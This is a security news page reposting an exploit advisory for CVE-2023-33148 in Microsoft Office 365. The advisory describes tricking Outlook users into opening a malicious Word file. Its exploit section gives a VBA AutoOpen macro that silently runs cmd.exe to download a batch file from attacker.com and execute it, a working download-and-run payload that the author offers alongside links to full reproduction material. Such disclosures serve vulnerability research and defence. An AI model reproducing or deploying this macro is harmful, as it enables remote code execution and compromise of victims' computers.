Security
Headlines
HeadlinesLatestCVEs

Headline

Microsoft Office 365 18.2305.1222.0 Remote Code Execution

Microsoft Office 365 version 18.2305.1222.0 suffers from a remote code execution vulnerability when a malicious link is clicked on in a Word file.

Packet Storm
#vulnerability#web#mac#windows#microsoft#git#rce#auth
## Title: Microsoft Office 365 Version 18.2305.1222.0 - Elevation ofPrivilege Vulnerability + RCE.## Author: nu11secur1ty## Date: 07.18.2023## Vendor: https://www.microsoft.com/## Software: https://www.microsoft.com/en-us/microsoft-365/microsoft-office## Reference: https://portswigger.net/web-security/access-control## CVE-2023-33148## Description:The Microsoft Office 365 Version 18.2305.1222.0 app is vulnerable toElevation of Privilege.The attacker can use this vulnerability to attach a very maliciousWORD file in the Outlook app which is a part of Microsoft Office 365and easily can trick the victim to click on it - opening it andexecuting a very dangerous shell command, in the background of thelocal PC. This execution is without downloading this malicious file,and this is a potential problem and a very dangerous case! This can bethe end of the victim's PC, it depends on the scenario.WARNING! Office 365 executes files directly from Outlook, without tempdownloading, security checking and etc.## Staus: HIGH Vulnerability[+]Exploit:- - - NOTE:This exploit is connected to the third-party server, and when thevictim clicks on it and opens it the content of the script which isinside will fetch on the machine locally and execute himself by usingMS Office 365 and Outlook app which is a part of the 365 API.```vbSub AutoOpen()  Call Shell("cmd.exe /S /c" & "curl -shttps://attacker.com/uqev/namaikitiputkata/golemui.bat > salaries.bat&& .\salaries.bat", vbNormalFocus)End Sub```## Reproduce:[href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33148)## Proof and Exploit[href](https://www.nu11secur1ty.com/2023/07/cve-2023-33148.html)## Time spend:00:35:00-- System Administrator - Infrastructure EngineerPenetration Testing EngineerExploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ andhttps://www.exploit-db.com/0day Exploit DataBase https://0day.today/home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=                          nu11secur1ty <http://nu11secur1ty.com/>-- System Administrator - Infrastructure EngineerPenetration Testing EngineerExploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and https://www.exploit-db.com/0day Exploit DataBase https://0day.today/home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=                          nu11secur1ty <http://nu11secur1ty.com/>

Related news

CVE-2023-33148

Microsoft Office Elevation of Privilege Vulnerability

CVE-2023-33148: Microsoft Office Elevation of Privilege Vulnerability

**What privileges could be gained by an attacker who successfully exploited the vulnerability?** An attacker who successfully exploited this vulnerability could execute RPC functions that are restricted to local clients only.

Packet Storm: Latest News

Red Hat Security Advisory 2024-8690-03